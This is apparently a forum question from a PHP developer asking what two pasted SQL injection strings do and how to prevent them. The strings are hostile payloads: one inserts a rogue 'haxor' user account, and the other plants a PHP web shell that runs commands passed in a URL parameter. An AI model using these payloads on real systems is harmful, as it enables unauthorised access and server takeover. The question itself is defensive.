Why are these snippets of code are risky? (SQL Injection)

1. ' union select 1, 'users (user, password) values (\'haxor\', \'1337\') #', 2 # 2. ' union select 1, 'modules (plugin) values (\'if (isset($_GET[\\\'cmd\\\'])) {passthru($_GET[\\\'cmd\\\']);}\') #', 2 # what those code snippets do? how can I prevent them in my php file? what is 1337? and why there are a lot of \ ?